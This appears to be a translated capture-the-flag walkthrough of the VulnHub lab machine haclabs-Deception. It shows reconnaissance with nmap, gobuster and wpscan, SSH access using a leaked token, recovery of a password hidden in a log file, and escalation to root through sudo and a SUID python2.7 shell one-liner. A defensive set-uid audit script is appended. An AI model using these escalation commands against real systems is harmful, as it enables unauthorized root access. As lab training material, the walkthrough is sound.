Target machine series: haclabs-Deception
1
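Introduction
Recently 暗月 has been running an open online class every Saturday, mainly for sharing techniques; anyone interested can follow the official account. This article is the technical write-up for last night's class and shares some of the technical details here. It may differ slightly from the live session, because many problems came up during the stream, so this write-up is more detailed.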
2
Target machine overview
Item | Details |
---|---|
Difficulty | Easy to Intermediate |
Description | This is a beginner level machine, getting a shell is a little bit harder, just think out of the box to get the shell. Privilege escalation is easy once you get the shell. This machine has 3 flags. Each flag is present in the Home directory of particular user. Be ready to test your Linux skills. |
Flag | 3 |
Download:
https://www.vulnhub.com/entry/haclabs-deception,427/
3
Testing the target machine
3.1 Information gathering
3.1.1 nmap scan
nmap -sC -sV 192.168.0.191 -oA deception-port -Pn
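3.2 Visiting the home page
Browsing to the IP shows the default Ubuntu Apache page. The scanner shows that a WordPress installation exists on the site, so we run a scanning tool against it to check whether other sensitive files exist underneath.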
http://192.168.0.191/wordpress
3.3 Directory scan
gobuster dir -u http://192.168.0.191/wordpress -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "php,html" -t 100
/index.php (Status: 301)
/wp-content (Status: 301)
/wp-login.php (Status: 200)
/wp-includes (Status: 301)
/readme.html (Status: 200)
/robots.html (Status: 200)
/wp-trackback.php (Status: 200)
/wp-admin (Status: 301)
/wp-signup.php (Status: 302)
/hint.html (Status: 200)
http://192.168.0.191/wordpress//robots.html
http://192.168.0.191/wordpress//hint.html
Please collect all the API tokens availabe on the home page
In other words, gather every API token shown on the home page.
3.4 Collecting the API tokens
API token:
5F4DCC3B5AA765D61D8327DEB882CF99
Cracking this value gives "password" (it is the MD5 hash of that string), so this may be the password.
3.5 Enumerating WordPress accounts
wpscan --url http://192.168.0.191/wordpress -e u
3.6 SSH login
Password: 5F4DCC3B5AA765D61D8327DEB882CF99
3.7 Getting the first flag
3.8 Getting the haclabs password
cat .systemlogs
ssdsdsdsdsdqwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnmzxcvbnmasdfghjklqwertyuiop1234567890qazxdswedcfrfgvbhyyhnkiollokmkijnjuyhbhytgvfrdcxdesxzsyuiopasdfghjklzxcvbnmzxcvbnmasdfghjklzaq123456vfr4567890mnbvcde4567890yuiopasdfghjklzxcvbnmzxcvbnmasdfghjklmnbvcxzsaq234567890-098765rewsxcvbnm,lpoiuytresxcbnmkoiuytredcyuiopasdfghjklzxcvbnmzxcvbnmasdfghjk!@#$dfkdfjdkfjdf!@#$fdjferheirdfdfksdjhfsg24356789yuiopasdfghjklzxcvbnmzxcvbnmasdfghjkljdfivnd"haclabs"jsdskdjskdjsldsklfjlkfdgl/dsfgkdhfgkdfgdjfhkagdhkdhgkkdzfkgdhfffgkhsfhgkdfhgkjlsfladjsflslfjlaaakjdflkaejflyuiopasdfghjklzxcvbnmzxcvbnmasdfghjklNDmsfmbwebrm43564576nu4r50q824305485103601856035860020^&*()sdjfsdflsdfaldjfleragkrjgkfdghdfhksjdhgsghkskskfskgkshkshksfhkgkrtho43euvnd,m,mnhjkjhgfdrtfghj,;poiuytgbvftyhjkllksjhgdfrteuyue"A=123456789"fdsgfhndsffjladjksfjlsdfjlfghfieruyiehgkfnjuyhbvcftyu789876543wsxcvbnm,mju76543asxcferfgbnm,klokjhgbvcxsdfklsdfweri34o58uwotueagsdgjlyuiopasdfghjklzxcvbnmzxcvbnmasdfghjklwlarqlewairp3wi4te0596q03496tiquieljkgrelrsjto5euyjgeldfhqowe5uy4seyjelsdglsoh45yeujhskehgesjhgsyuiopasdfghjklzxcvbnmzxcvbnmasdfghjkldsklflssldfjlsdfjsldfjsldfjld"+A[::-1]"fjlsdnvsldvnsujnhgfqwertyuioplkjhgfdsazxcvbnm,mnbvcxzasdfghjkl;poiuytrewqazxsedcvftghnklyuiopasdfghjklzxcvbnmzxcvbnmasdfghjklyuiopasdfghjklzxcvbnmzxcvbnmasdfghjklyuiopasdfghjklzxcvbnmzxcvbnmasdfghjklyuiopasdfghjklzxcvbnmzxcvbnmasdfghjkldjfkdslfjsldfjsldfjlw4o32894829348293489289389
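The quoted fragments buried in the output are: haclabs A=123456789 +A[::-1]
A[::-1] reverses A, so the password is probably haclabs followed by 987654321: haclabs987654321
Password: haclabs987654321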
su haclabs
3.9 Getting the second flag
3.10 Privilege escalation
3.10.1 sudo privilege escalation
sudo -l
The output shows that any command can be run after entering the password.
3.10.2 SUID privilege escalation
find / -type f -perm -u=s 2>/dev/null
/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
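Seen from the defender's side, the same find sweep can serve as an audit that flags set-uid script interpreters such as the python2.7 binary above. This is an added example, not part of the original article; the interpreter name list is an assumed, non-exhaustive starting point and the sample tree is constructed.

```bash
#!/usr/bin/env bash
# Added example, not from the original walkthrough.
# Audits a tree for set-uid files and flags script interpreters: a set-uid
# interpreter lets any local user run code as the file's owner (see 3.10.2).

# Assumed, non-exhaustive list of interpreter/shell name patterns.
is_interpreter() {
    case "$(basename "$1")" in
        python*|perl*|ruby*|php*|lua*|node|sh|bash|dash|zsh) return 0 ;;
        *) return 1 ;;
    esac
}

# audit_suid ROOT: one line per set-uid file, "RISK <path>" or "ok <path>".
audit_suid() {
    local root="${1:-/}" path
    # -perm -4000 is the numeric form of the page's -perm -u=s
    find "$root" -xdev -type f -perm -4000 2>/dev/null | sort |
    while IFS= read -r path; do
        if is_interpreter "$path"; then echo "RISK $path"; else echo "ok $path"; fi
    done
}

# count_risky ROOT: number of set-uid interpreters under ROOT.
count_risky() {
    audit_suid "$1" | grep -c '^RISK ' || true
}

# Constructed sample tree (empty files, only the mode bits matter).
make_demo_tree() {
    local d
    d=$(mktemp -d)
    mkdir -p "$d/usr/bin"
    : > "$d/usr/bin/python2.7"; chmod 4755 "$d/usr/bin/python2.7"
    : > "$d/usr/bin/passwd";    chmod 4755 "$d/usr/bin/passwd"
    : > "$d/usr/bin/perl";      chmod 0755 "$d/usr/bin/perl"   # no set-uid bit
    echo "$d"
}

demo=$(make_demo_tree)
audit_suid "$demo"
rm -rf "$demo"
```

On a real host, run audit_suid / as root and clear the bit on any flagged interpreter with chmod u-s.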
3.11 Getting the third flag